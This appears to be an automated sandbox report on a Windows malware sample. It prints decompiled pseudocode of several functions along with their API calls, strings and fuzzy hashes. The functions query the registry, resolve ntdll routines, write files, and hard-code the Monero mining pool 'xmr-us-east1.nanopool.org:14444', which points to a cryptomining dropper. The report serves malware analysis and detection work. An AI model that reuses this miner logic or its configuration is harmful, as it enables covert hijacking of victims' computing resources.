                                                                                                                                          			E004085B0(void* __ecx, void* __eflags, long _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				void* _v8;
				void* _v16;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v240;
				void _v248;
				char _v1272;
				short _v3320;
				long _t35;
				long _t53;
				long _t58;

				_v8 = 0;
				E00401BB0( &_v3320, 0, 0x800);
				_t35 = _a4;
				if(_t35 != 0x80000002) {
					if(_t35 != 0x80000001) {
						goto L8;
					} else {
						E00401BB0( &_v1272, 0, 0x400);
						if(E004082B0( &_v1272) == 0) {
							goto L8;
						} else {
							E00401A00( &_v3320, L"\\Registry\\User\\");
							E00401970( &_v3320,  &_v1272);
							goto L5;
						}
					}
				} else {
					E00401A00( &_v3320, L"\\Registry\\Machine");
					L5:
					E00401970( &_v3320, _a8);
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0xc], xmm0");
					RtlInitUnicodeString( &_v16,  &_v3320);
					_v48 = 0x18;
					_v40 =  &_v16;
					_v44 = 0;
					_v36 = 0x40;
					_v32 = 0;
					_v28 = 0;
					_t53 = NtOpenKey( &_v8, 0x20119,  &_v48); // executed
					if(_t53 < 0) {
						L8:
						return 0;
					} else {
						asm("xorps xmm0, xmm0");
						asm("movq [ebp-0x14], xmm0");
						RtlInitUnicodeString( &_v24, _a12);
						_t58 = NtQueryValueKey(_v8,  &_v24, 1,  &_v248, 0xc8,  &_a4); // executed
						_push(_v8);
						if(_t58 >= 0) {
							NtClose();
							E00401A00(_a16, _v240 +  &_v248);
							return 1;
						} else {
							NtClose();
							goto L8;
						}
					}
				}
			}



















                                                                                                                                          0x004085c4
                                                                                                                                          0x004085ce
                                                                                                                                          0x004085d3
                                                                                                                                          0x004085de
                                                                                                                                          0x004085fb
                                                                                                                                          0x00000000
                                                                                                                                          0x00408601
                                                                                                                                          0x0040860f
                                                                                                                                          0x00408625
                                                                                                                                          0x00000000
                                                                                                                                          0x0040862b
                                                                                                                                          0x00408637
                                                                                                                                          0x0040864a
                                                                                                                                          0x00000000
                                                                                                                                          0x0040864f
                                                                                                                                          0x00408625
                                                                                                                                          0x004085e0
                                                                                                                                          0x004085ec
                                                                                                                                          0x00408652
                                                                                                                                          0x0040865c
                                                                                                                                          0x0040866a
                                                                                                                                          0x0040866d
                                                                                                                                          0x00408677
                                                                                                                                          0x00408680
                                                                                                                                          0x00408687
                                                                                                                                          0x00408696
                                                                                                                                          0x0040869e
                                                                                                                                          0x004086a5
                                                                                                                                          0x004086ac
                                                                                                                                          0x004086b3
                                                                                                                                          0x004086bb
                                                                                                                                          0x004086fe
                                                                                                                                          0x00408703
                                                                                                                                          0x004086bd
                                                                                                                                          0x004086c3
                                                                                                                                          0x004086c7
                                                                                                                                          0x004086cc
                                                                                                                                          0x004086eb
                                                                                                                                          0x004086f1
                                                                                                                                          0x004086f6
                                                                                                                                          0x00408704
                                                                                                                                          0x0040871c
                                                                                                                                          0x0040872c
                                                                                                                                          0x004086f8
                                                                                                                                          0x004086f8
                                                                                                                                          0x00000000
                                                                                                                                          0x004086f8
                                                                                                                                          0x004086f6
                                                                                                                                          0x004086bb

                                                                                                                                          APIs
                                                                                                                                          • RtlInitUnicodeString.NTDLL(?,?), ref: 00408677
                                                                                                                                          • NtOpenKey.NTDLL(00000000,00020119,00000018), ref: 004086B3
                                                                                                                                          • RtlInitUnicodeString.NTDLL(74B04D40,00000000), ref: 004086CC
                                                                                                                                          • NtQueryValueKey.NTDLL(00000000,74B04D40,00000001,?,000000C8,00404596), ref: 004086EB
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 004086F8
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00408704
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseInitStringUnicode$OpenQueryValue
                                                                                                                                          • String ID: @$\Registry\Machine$\Registry\User\
                                                                                                                                          • API String ID: 2538698014-2338602205
                                                                                                                                          • Opcode ID: 1e4a2f9ca1f13b42ab8a43e3d6aa5f8f717dc5ca93966d64937e1c4d3befbe2b
                                                                                                                                          • Instruction ID: d2628628a94712c675b0c195a5174935581fdd4bc81ba0214100a7ffc09d6dc1
                                                                                                                                          • Opcode Fuzzy Hash: 1e4a2f9ca1f13b42ab8a43e3d6aa5f8f717dc5ca93966d64937e1c4d3befbe2b
                                                                                                                                          • Instruction Fuzzy Hash: 1C412FB1D4020EABDB10DBA0CD45FEE77BCAF14308F1045B6F904F2191EB799A589B59
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00402E40, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 111nativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                          			E00402E40(void* __ecx, intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				long _v12;
				intOrPtr _v16;
				short _v18;
				char _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				char* _v36;
				long _v40;
				void* _v44;
				short _t35;
				long _t41;
				void* _t44;
				void* _t48;
				void* _t50;
				void* _t54;
				intOrPtr* _t57;
				void* _t62;

				_t54 = __ecx;
				_v12 = 0;
				if(_a8 != 0) {
					 *0x5d1134 = 0;
					goto L4;
				} else {
					_t48 =  *0x5d1134; // 0x2f90000
					if(_t48 == 0) {
						L4:
						_t62 =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14)))) + 0x10);
						if(_t62 != 0) {
							_v8 = E00402F80(_t54, _t62, "NtOpenSection");
							_t50 = E00402F80(_t54, _t62, "NtMapViewOfSection");
							_t57 = E00402F80(_t54, _t62, "NtClose");
							if(_v8 == 0 || _t50 == 0) {
								L12:
								return 0;
							} else {
								_t55 = _a4;
								_v16 = _a4;
								_t35 = (E00401B40(_a4) & 0x0000ffff) + (E00401B40(_a4) & 0x0000ffff);
								_v44 = 0x18;
								_v20 = _t35;
								_v18 = _t35;
								_v36 =  &_v20;
								_v40 = 0;
								_v32 = 0x40;
								_v28 = 0;
								_v24 = 0;
								if(NtOpenSection( &_a8, 0xc,  &_v44) >= 0) {
									_t41 = NtMapViewOfSection(_a8, 0xffffffff, 0x5d1134, 0, 0, 0,  &_v12, 1, 0, 2); // executed
									_push(_a8);
									if(_t41 >= 0) {
										if( *0x5d1134 == 0) {
											goto L11;
										} else {
											NtClose();
											_t44 =  *0x5d1134; // 0x2f90000
											return _t44;
										}
									} else {
										L11:
										 *_t57();
										goto L12;
									}
								} else {
									E00402DD0(_t55);
									 *0x5d1134 = _t62;
									return _t62;
								}
							}
						} else {
							return 0;
						}
					} else {
						return _t48;
					}
				}
			}






















                                                                                                                                          0x00402e40
                                                                                                                                          0x00402e4a
                                                                                                                                          0x00402e51
                                                                                                                                          0x00402e60
                                                                                                                                          0x00000000
                                                                                                                                          0x00402e53
                                                                                                                                          0x00402e53
                                                                                                                                          0x00402e5a
                                                                                                                                          0x00402e6a
                                                                                                                                          0x00402e79
                                                                                                                                          0x00402e7e
                                                                                                                                          0x00402e9a
                                                                                                                                          0x00402ea8
                                                                                                                                          0x00402eb2
                                                                                                                                          0x00402eb8
                                                                                                                                          0x00402f55
                                                                                                                                          0x00402f5d
                                                                                                                                          0x00402ec6
                                                                                                                                          0x00402ec6
                                                                                                                                          0x00402eca
                                                                                                                                          0x00402ed8
                                                                                                                                          0x00402eda
                                                                                                                                          0x00402ee1
                                                                                                                                          0x00402ee5
                                                                                                                                          0x00402eec
                                                                                                                                          0x00402ef8
                                                                                                                                          0x00402f00
                                                                                                                                          0x00402f07
                                                                                                                                          0x00402f0e
                                                                                                                                          0x00402f1a
                                                                                                                                          0x00402f4a
                                                                                                                                          0x00402f4c
                                                                                                                                          0x00402f51
                                                                                                                                          0x00402f65
                                                                                                                                          0x00000000
                                                                                                                                          0x00402f67
                                                                                                                                          0x00402f67
                                                                                                                                          0x00402f69
                                                                                                                                          0x00402f74
                                                                                                                                          0x00402f74
                                                                                                                                          0x00402f53
                                                                                                                                          0x00402f53
                                                                                                                                          0x00402f53
                                                                                                                                          0x00000000
                                                                                                                                          0x00402f53
                                                                                                                                          0x00402f1c
                                                                                                                                          0x00402f1c
                                                                                                                                          0x00402f23
                                                                                                                                          0x00402f2f
                                                                                                                                          0x00402f2f
                                                                                                                                          0x00402f1a
                                                                                                                                          0x00402e80
                                                                                                                                          0x00402e86
                                                                                                                                          0x00402e86
                                                                                                                                          0x00402e5f
                                                                                                                                          0x00402e5f
                                                                                                                                          0x00402e5f
                                                                                                                                          0x00402e5a

                                                                                                                                          APIs
                                                                                                                                          • NtOpenSection.NTDLL(00000000,0000000C,00000018,?,?,?,?,74B04D40,00000000,00000000), ref: 00402F15
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: OpenSection
                                                                                                                                          • String ID: @$NtClose$NtMapViewOfSection$NtOpenSection
                                                                                                                                          • API String ID: 1950954290-3069760132
                                                                                                                                          • Opcode ID: 17615c4fecd44b4c39521a1cccd82976107e2cb8dff730541d4d008ca0a3743f
                                                                                                                                          • Instruction ID: 4647d7da09d8d8885e3b0c4b8fe7eb1682a85353f2c0fdbf0df9b865095ef5b3
                                                                                                                                          • Opcode Fuzzy Hash: 17615c4fecd44b4c39521a1cccd82976107e2cb8dff730541d4d008ca0a3743f
                                                                                                                                          • Instruction Fuzzy Hash: 1D319371A01219ABDB10DFA9DD45BDEB7B8EB04714F10416BE908F72C0D7B99A04DB98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00407AF0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92nativefileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 20%
                                                                                                                                          			E00407AF0(WCHAR* _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				void* _v16;
				long _v20;
				char _v24;
				long _v28;
				void* _v32;
				long _v36;
				long _v40;
				long _v44;
				long _v48;
				intOrPtr _v52;
				char* _v56;
				long _v60;
				void* _v64;
				signed char _t35;
				signed int _t36;
				long _t45;
				void* _t48;
				void* _t54;

				_t35 = GetFileAttributesW(_a4); // executed
				if(_t35 == 0xffffffff || (_t35 & 0x00000010) != 0) {
					asm("xorps xmm0, xmm0");
					_v8 = 0;
					_v64 = 0;
					asm("movups [ebp-0x38], xmm0");
					_v44 = 0;
					_v16 = 0;
					_v12 = 0;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					_t36 = E00401B40(_a8);
					_v20 = 0;
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0x14], xmm0");
					_t54 = 2 + _t36 * 2;
					_push(0);
					_push(0);
					_push( &_v24);
					_push(_a4);
					if( *0x5d10b8() != 1) {
						L7:
						return 0; // executed
					} else {
						_v64 = 0x18;
						_v56 =  &_v24;
						_v60 = 0;
						_v52 = 0x40;
						_v48 = 0;
						_v44 = 0;
						_t45 = NtCreateFile( &_v8, 0x120116,  &_v64,  &_v16,  &_v32, 0x80, 0, 0, 0x60, 0, 0); // executed
						if(_t45 != 0) {
							goto L7;
						} else {
							_t48 =  *0x5d10c0(_v8, 0, 0, 0,  &_v16, _a8, _t54,  &_v40, _t45); // executed
							_push(_v8);
							if(_t48 == 0) {
								NtClose(); // executed
								return 1;
							} else {
								NtClose();
								goto L7;
							}
						}
					}
				} else {
					return 1;
				}
			}























                                                                                                                                          0x00407af9
                                                                                                                                          0x00407b02
                                                                                                                                          0x00407b15
                                                                                                                                          0x00407b18
                                                                                                                                          0x00407b1f
                                                                                                                                          0x00407b26
                                                                                                                                          0x00407b2a
                                                                                                                                          0x00407b31
                                                                                                                                          0x00407b38
                                                                                                                                          0x00407b3f
                                                                                                                                          0x00407b46
                                                                                                                                          0x00407b4d
                                                                                                                                          0x00407b54
                                                                                                                                          0x00407b5b
                                                                                                                                          0x00407b63
                                                                                                                                          0x00407b6a
                                                                                                                                          0x00407b6d
                                                                                                                                          0x00407b72
                                                                                                                                          0x00407b79
                                                                                                                                          0x00407b7b
                                                                                                                                          0x00407b80
                                                                                                                                          0x00407b81
                                                                                                                                          0x00407b8c
                                                                                                                                          0x00407c12
                                                                                                                                          0x00407c18
                                                                                                                                          0x00407b92
                                                                                                                                          0x00407ba4
                                                                                                                                          0x00407bab
                                                                                                                                          0x00407bb5
                                                                                                                                          0x00407bc0
                                                                                                                                          0x00407bd0
                                                                                                                                          0x00407bd8
                                                                                                                                          0x00407bdf
                                                                                                                                          0x00407be7
                                                                                                                                          0x00000000
                                                                                                                                          0x00407be9
                                                                                                                                          0x00407bff
                                                                                                                                          0x00407c05
                                                                                                                                          0x00407c0a
                                                                                                                                          0x00407c19
                                                                                                                                          0x00407c28
                                                                                                                                          0x00407c0c
                                                                                                                                          0x00407c0c
                                                                                                                                          0x00000000
                                                                                                                                          0x00407c0c
                                                                                                                                          0x00407c0a
                                                                                                                                          0x00407be7
                                                                                                                                          0x00407b08
                                                                                                                                          0x00407b10
                                                                                                                                          0x00407b10

                                                                                                                                          APIs
                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,0040685B,?,?,?,.exe",?,?,?,[InternetShortcut]URL="file:///), ref: 00407AF9
                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00407B84
                                                                                                                                          • NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00407BDF
                                                                                                                                          • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407BFF
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00407C0C
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00407C19
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$ClosePath$AttributesCreateNameName_Write
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 2032416576-2766056989
                                                                                                                                          • Opcode ID: b68e2da1d8a01fec83c1ced52e1a281f962c96c99bbb349389263c075fbb7d0c
                                                                                                                                          • Instruction ID: 9f52158c82e738a9b8372dbf463c3a00265b35efd882e416b0d337a0f99a21ed
                                                                                                                                          • Opcode Fuzzy Hash: b68e2da1d8a01fec83c1ced52e1a281f962c96c99bbb349389263c075fbb7d0c
                                                                                                                                          • Instruction Fuzzy Hash: 0E314270D4020CBBEF10DF90DD49BDEBBB8EB04314F208256F904B62D0D7B66A989B95
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00403BC0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63nativefileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                          			E00403BC0(char _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				long _v20;
				void* _v24;
				long _v28;
				long _v32;
				long _v36;
				long _v40;
				intOrPtr _v44;
				char* _v48;
				long _v52;
				void* _v56;
				long _t29;
				void* _t33;

				asm("xorps xmm0, xmm0");
				_v36 = 0;
				asm("movups [ebp-0x30], xmm0");
				_v8 = 0;
				_v48 =  &_a4;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v20 = 0;
				_v32 = 0;
				_v28 = 0;
				_v56 = 0x18;
				_v52 = 0;
				_v44 = 0x40;
				_v40 = 0;
				_v36 = 0;
				_t29 = NtCreateFile( &_v8, 0x120116,  &_v56,  &_v16,  &_v24, 0x80, 0, 0, 0x60, 0, 0); // executed
				if(_t29 != 0) {
					L3:
					return 0;
				} else {
					_t33 =  *0x5d10c0(_v8, 0, 0, 0,  &_v16, "xmr-us-east1.nanopool.org:14444", 0xcc8,  &_v32, _t29); // executed
					_push(_v8);
					if(_t33 == 0) {
						NtClose();
						return 1;
					} else {
						NtClose();
						goto L3;
					}
				}
			}


















                                                                                                                                          0x00403bd0
                                                                                                                                          0x00403bd3
                                                                                                                                          0x00403bda
                                                                                                                                          0x00403be6
                                                                                                                                          0x00403bed
                                                                                                                                          0x00403bf7
                                                                                                                                          0x00403c02
                                                                                                                                          0x00403c12
                                                                                                                                          0x00403c1a
                                                                                                                                          0x00403c21
                                                                                                                                          0x00403c28
                                                                                                                                          0x00403c2f
                                                                                                                                          0x00403c36
                                                                                                                                          0x00403c3d
                                                                                                                                          0x00403c44
                                                                                                                                          0x00403c4b
                                                                                                                                          0x00403c52
                                                                                                                                          0x00403c5a
                                                                                                                                          0x00403c8b
                                                                                                                                          0x00403c90
                                                                                                                                          0x00403c5c
                                                                                                                                          0x00403c78
                                                                                                                                          0x00403c7e
                                                                                                                                          0x00403c83
                                                                                                                                          0x00403c91
                                                                                                                                          0x00403c9f
                                                                                                                                          0x00403c85
                                                                                                                                          0x00403c85
                                                                                                                                          0x00000000
                                                                                                                                          0x00403c85
                                                                                                                                          0x00403c83

                                                                                                                                          APIs
                                                                                                                                          • NtCreateFile.NTDLL(00000000,00120116,?,00403B8C,?,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00403C52
                                                                                                                                          • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,xmr-us-east1.nanopool.org:14444,00000CC8,00000000,00000000), ref: 00403C78
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00403C85
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00403C91
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseFile$CreateWrite
                                                                                                                                          • String ID: @$xmr-us-east1.nanopool.org:14444
                                                                                                                                          • API String ID: 3559581051-493715795
                                                                                                                                          • Opcode ID: 56d88aa81e982c61328a5cbb6ae928bc3dbf0937083e45afe5ced92eb89ea321
                                                                                                                                          • Instruction ID: 92c5b12b779cf31cce4769230797ba73a26a306a4adc66bd02839d29b74e70ae
                                                                                                                                          • Opcode Fuzzy Hash: 56d88aa81e982c61328a5cbb6ae928bc3dbf0937083e45afe5ced92eb89ea321
                                                                                                                                          • Instruction Fuzzy Hash: A521EDB1E4120DBBEB10DF90DD49BDFBBB8EB04704F204256F904B62C0D7B95A489B99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00403720, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50filenativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • NtCreateFile.NTDLL(005D2DF0,00120089,?,]D@,00000000,00000080,00000001,00000001,00000060,00000000,00000000), ref: 004037A4
                                                                                                                                          • NtCreateFile.NTDLL(005D2124,00120089,?,]D@,00000000,00000080,00000001,00000001,00000060,00000000,00000000), ref: 004037C1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateFile
                                                                                                                                          • String ID: @$]D@
                                                                                                                                          • API String ID: 823142352-925688143
                                                                                                                                          • Opcode ID: 03611e97650f41380acb2e73d0c1b10cf4d46751ae042211fc88b9fc410341d6
                                                                                                                                          • Instruction ID: 29e337131a3785b045790d3cbff8cd25c944f4b1d8e7a2be103306273d9b840e
                                                                                                                                          • Opcode Fuzzy Hash: 03611e97650f41380acb2e73d0c1b10cf4d46751ae042211fc88b9fc410341d6
                                                                                                                                          • Instruction Fuzzy Hash: CD118FB0A4130DABEB20DF90CD49BDEBBF8BB18315F10835BE514B62C0D7B556488B98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00406990, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43filenativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 18%
                                                                                                                                          			E00406990(char _a4) {
				char _v12;
				long _v16;
				void* _v20;
				long _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				char* _v44;
				long _v48;
				void* _v52;
				long _t25;

				_t1 =  &_v12; // 0x406875
				_v52 = 0;
				_t3 =  &_a4; // 0x406875
				asm("xorps xmm0, xmm0");
				_v32 = 0;
				asm("movups [ebp-0x2c], xmm0");
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				asm("movq [ebp-0x8], xmm0");
				 *0x5d10b8( *_t3, _t1, 0, 0);
				_v52 = 0x18;
				_v44 =  &_v12;
				_v48 = 0;
				_v40 = 0x40;
				_v36 = 0;
				_v32 = 0;
				_t25 = NtCreateFile(0x5d2dfc, 0x120089,  &_v52,  &_v28,  &_v20, 0x80, 0, 1, 0x60, 0, 0); // executed
				return _t25;
			}















                                                                                                                                          0x0040699a
                                                                                                                                          0x0040699d
                                                                                                                                          0x004069a5
                                                                                                                                          0x004069a8
                                                                                                                                          0x004069ab
                                                                                                                                          0x004069b2
                                                                                                                                          0x004069b6
                                                                                                                                          0x004069bd
                                                                                                                                          0x004069c4
                                                                                                                                          0x004069cb
                                                                                                                                          0x004069d2
                                                                                                                                          0x004069d7
                                                                                                                                          0x004069ef
                                                                                                                                          0x004069f6
                                                                                                                                          0x00406a00
                                                                                                                                          0x00406a0b
                                                                                                                                          0x00406a1d
                                                                                                                                          0x00406a24
                                                                                                                                          0x00406a2b
                                                                                                                                          0x00406a34

                                                                                                                                          APIs
                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(uh@,uh@,00000000,00000000), ref: 004069D7
                                                                                                                                          • NtCreateFile.NTDLL(005D2DFC,00120089,00000018,00000000,00000000,00000080,00000000,00000001,00000060,00000000,00000000), ref: 00406A2B
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Path$CreateFileNameName_
                                                                                                                                          • String ID: uh@$uh@
                                                                                                                                          • API String ID: 3479931691-972736353
                                                                                                                                          • Opcode ID: 45a6eada9ea1dd906960385c986ed5d86993abecfb8ffa17f30c1ee7e5eb38c1
                                                                                                                                          • Instruction ID: 0c139073421148209480b6c35fda580d69656a2aecaa2f90744c4bda58df8354
                                                                                                                                          • Opcode Fuzzy Hash: 45a6eada9ea1dd906960385c986ed5d86993abecfb8ffa17f30c1ee7e5eb38c1
                                                                                                                                          • Instruction Fuzzy Hash: E811DBB4D5031DABEB10DF90CD49BEEBBB8BB04704F10420AE9007A2C0D7B522988F99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00403B50, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33nativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                          			E00403B50(void* __edx, char _a4, intOrPtr _a8) {
				void* _t6;
				void* _t7;
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t14;

				_t11 = __edx;
				E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
				_t6 =  *0x5d2df4; // 0x3bc
				_t13 = _t12 + 0x10;
				if(_t6 != 0 && _t6 != 0xffffffff) {
					NtClose(_t6);
				}
				_push(_a8);
				_t7 = E00403BC0(_a4); // executed
				_t14 = _t13 + 8;
				if(_t7 != 0) {
					_push(_a8);
					E00403680(_t11, _a4); // executed
					_t14 = _t14 + 8;
				}
				return E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
			}









                                                                                                                                          0x00403b50
                                                                                                                                          0x00403b64
                                                                                                                                          0x00403b69
                                                                                                                                          0x00403b6e
                                                                                                                                          0x00403b73
                                                                                                                                          0x00403b7b
                                                                                                                                          0x00403b7b
                                                                                                                                          0x00403b81
                                                                                                                                          0x00403b87
                                                                                                                                          0x00403b8c
                                                                                                                                          0x00403b91
                                                                                                                                          0x00403b93
                                                                                                                                          0x00403b99
                                                                                                                                          0x00403b9e
                                                                                                                                          0x00403b9e
                                                                                                                                          0x00403bbb

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Close
                                                                                                                                          • String ID: 0125789244697858$0125789244697858$xmr-us-east1.nanopool.org:14444
                                                                                                                                          • API String ID: 3535843008-899868268
                                                                                                                                          • Opcode ID: 05ddcafc9e6955f83f09dbcfd663fe33b0abdaadcb5b8f1db937436fe77c1a83
                                                                                                                                          • Instruction ID: b842e7685c2f69810a8eda15092c5b8a142aacb66778a7cb45de6b9a8cdd56ec
                                                                                                                                          • Opcode Fuzzy Hash: 05ddcafc9e6955f83f09dbcfd663fe33b0abdaadcb5b8f1db937436fe77c1a83
                                                                                                                                          • Instruction Fuzzy Hash: 5EF0B43168120476EF203F999C03E493E585B2475EF004527FE18742E3E5BAD275955E
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 00408A50, Relevance: 6.1, APIs: 4, Instructions: 52nativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                          			E00408A50(void* _a4) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				long _v28;
				long _v32;
				long _v36;
				void* _v40;
				void* _t21;
				void* _t27;
				int _t28;

				_t21 = _a4;
				if(_t21 != 0) {
					_v16 = _t21;
					_a4 = 0;
					_v40 = 0x18;
					_v36 = 0;
					_v28 = 0;
					_v32 = 0;
					_v24 = 0;
					_v20 = 0;
					_v12 = 0;
					if(NtOpenProcess( &_a4, 0x400,  &_v40,  &_v16) != 0) {
						goto L1;
					} else {
						_t27 = _a4;
						if(_t27 == 0) {
							goto L1;
						} else {
							_v8 = 0;
							_t28 = GetExitCodeProcess(_t27,  &_v8); // executed
							_push(_a4);
							if(_t28 != 0) {
								NtClose(); // executed
								return 0 | _v8 == 0x00000103;
							} else {
								return NtClose() | 0xffffffff; // executed
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}















                                                                                                                                          0x00408a53
                                                                                                                                          0x00408a5b
                                                                                                                                          0x00408a63
                                                                                                                                          0x00408a6d
                                                                                                                                          0x00408a7d
                                                                                                                                          0x00408a85
                                                                                                                                          0x00408a8c
                                                                                                                                          0x00408a93
                                                                                                                                          0x00408a9a
                                                                                                                                          0x00408aa1
                                                                                                                                          0x00408aa8
                                                                                                                                          0x00408ab7
                                                                                                                                          0x00000000
                                                                                                                                          0x00408ab9
                                                                                                                                          0x00408ab9
                                                                                                                                          0x00408abe
                                                                                                                                          0x00000000
                                                                                                                                          0x00408ac0
                                                                                                                                          0x00408ac3
                                                                                                                                          0x00408acc
                                                                                                                                          0x00408ad2
                                                                                                                                          0x00408ad7
                                                                                                                                          0x00408ae6
                                                                                                                                          0x00408afb
                                                                                                                                          0x00408ad9
                                                                                                                                          0x00408ae5
                                                                                                                                          0x00408ae5
                                                                                                                                          0x00408ad7
                                                                                                                                          0x00408abe
                                                                                                                                          0x00408a5d
                                                                                                                                          0x00408a5d
                                                                                                                                          0x00408a62
                                                                                                                                          0x00408a62

                                                                                                                                          APIs
                                                                                                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00408AAF
                                                                                                                                          • GetExitCodeProcess.KERNELBASE ref: 00408ACC
                                                                                                                                          • NtClose.NTDLL(00000000), ref: 00408AD9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$CloseCodeExitOpen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2358878597-0
                                                                                                                                          • Opcode ID: 68b3489fe5460219a3091c2dd7fb609aeb590185205d4daf2d69748998342c46
                                                                                                                                          • Instruction ID: 1b6c16884e814be030dd65664031e946cab864b4b59cb1ac47a8a8f8596fd444
                                                                                                                                          • Opcode Fuzzy Hash: 68b3489fe5460219a3091c2dd7fb609aeb590185205d4daf2d69748998342c46
                                                                                                                                          • Instruction Fuzzy Hash: 55111F71A0120CAFDF10DFA0C9487EE7BF8AB04354F10456AE818E6280EB799B48DF95
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 004068E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43filenativeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 16%
